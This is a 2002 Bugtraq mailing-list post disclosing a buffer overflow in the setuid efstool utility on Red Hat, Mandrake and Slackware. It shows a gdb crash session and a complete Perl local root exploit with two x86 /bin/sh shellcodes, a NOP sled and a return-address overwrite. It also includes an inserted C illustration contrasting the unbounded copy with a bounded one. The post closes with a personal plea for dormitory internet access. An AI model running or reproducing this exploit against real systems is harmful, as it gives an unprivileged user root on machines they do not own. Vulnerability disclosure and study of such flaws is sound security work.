efstool local root exploit
Date: 28 Jun 2002 00:46:39 -0000
From: clorox@ptrace-networks.net
To: bugtraq@securityfocus.com
Subject: efstool local root exploit
Ptrace Networks Security
--------------------------
A buffer overflow in the efstool program as shipped on Red Hat, Mandrake, and Slackware
can be successfully exploited to gain local root.
[clorox@ptnw clorox]$ efstool `perl -e 'print "A" x 3000'`
Segmentation fault
[clorox@ptnw clorox]$ gdb efstool
GNU gdb 5.1.1
Copyright 2002 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "i386-mandrake-linux"...(no debugging symbols found)...
(gdb) r `perl -e 'print "A" x 3000'`
Starting program: /usr/bin/efstool `perl -e 'print "A" x 3000'`
(no debugging symbols found)...(no debugging symbols found)...(no debugging symbols found)...
(no debugging symbols found)...(no debugging symbols found)...
Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
(gdb) info reg esp
esp 0xbfffe890 0xbfffe890
(gdb)
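The bug class behind the crash above, as an added illustration that is not efstool's source (the post does not include it): a fixed-size stack buffer filled from argv[1] with no bound check, next to a hardened version that refuses oversized input before copying. NAMELEN, vulnerable_open, safe_open and would_reject are hypothetical names chosen for this example.

```c
#include <errno.h>
#include <stdio.h>
#include <string.h>
/* Hypothetical buffer size; the post does not show efstool's source or its real size. */
#define NAMELEN 256

/* Vulnerable pattern (for contrast only, never called here): the argument is
 * copied into a fixed stack buffer unbounded, so a string longer than NAMELEN
 * runs over the saved return address; hence gdb's fault at 0x41414141. */
void vulnerable_open(const char *arg)
{
    char name[NAMELEN];
    strcpy(name, arg);              /* unbounded copy: classic stack overflow */
    printf("opening %s\n", name);
}

/* Hardened form: verify the argument fits, reject it otherwise, and copy with
 * an explicit bound. Returns 0 on success, -1 (errno = ENAMETOOLONG) if the
 * argument is too long; a setuid tool should print an error and exit then. */
int safe_open(const char *arg)
{
    char name[NAMELEN];
    const char *end = memchr(arg, '\0', NAMELEN);   /* NUL within the buffer? */
    if (end == NULL) {
        errno = ENAMETOOLONG;
        return -1;
    }
    memcpy(name, arg, (size_t)(end - arg) + 1);     /* bounded copy incl. NUL */
    printf("opening %s\n", name);
    return 0;
}

/* Constructed-input probe mirroring the post's test: build a string of `len`
 * 'A's and report 1 if safe_open rejects it, 0 if it accepts it. */
int would_reject(size_t len)
{
    static char buf[4096];
    if (len >= sizeof buf) return -1;   /* probe limited to 4095 bytes */
    memset(buf, 'A', len);
    buf[len] = '\0';
    return safe_open(buf) != 0;
}

int main(int argc, char **argv)
{
    if (argc < 2) { fprintf(stderr, "usage: %s <name>\n", argv[0]); return 2; }
    if (safe_open(argv[1]) != 0) { perror("argument rejected"); return 1; }
    return 0;
}
```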
example:
#!/usr/bin/perl
# efstool root exploit
# written by clorox of Ptrac Networks for BKACC(Bored Kids At ComputerCamp)
# give the campers internet grogan!
#
# tested to work on slackware 8, mandrake 8, mandrake 7.1
# tweaks may be needed on the offset
# method 1 works more often but
# method 2 is faster but not too good
#
#
# enjoy -clorox
# perl efs.pl -1000
$shellcode =
"\xeb\x1d\x5e\x29\xc0\x88\x46\x07\x89".
"\x46\x0c\x89\x76\x08\xb0\x0b\x87\xf3".
"\x8d\x4b\x08\x8d\x53\x0c\xcd\x80\x29".
"\xc0\x40\xcd\x80\xe8\xde\xff\xff\xff".
"/bin/sh";
$shellcode2 =
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88".
"\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3".
"\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31".
"\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff".
"\xff\xff/bin/sh";
$ret = "0xbfffe890";
$offset = $ARGV[0];
$nop = "\x90";
if ($ARGV[1] eq "m1") {
    $len = 3000;
    for ($i = 0; $i < ($len - length($shellcode)); $i++) {
        $buffer .= $nop;
    }
    $buffer .= $shellcode;
} elsif ($ARGV[1] eq "m2") {
    $len = 10010;
    for ($i = 0; $i < ($len - length($shellcode)); $i++) {
        $buffer .= $nop;
    }
    $buffer .= $shellcode2;
} else {
    print "You must specify a method fool!\n";
    print "perl $0 <offset> m1 or m2\n";
}
$buffer .= pack('l', ($ret + $offset));
$buffer .= pack('l', ($ret + $offset));
exec("efstool $buffer");
# and on the seventh day clorox said "LET THERE BE SHELL!"
And on a personal note,
grogan, or any other admins of ceboston: the campers here deserve internet
in our rooms; the computer labs aren't conducive to doing research. As you
can see, we would use it for positive things such as posting to Bugtraq. If
you read this and want to talk it over, talk to me; I'm in room 105 in New
Dorm.
-max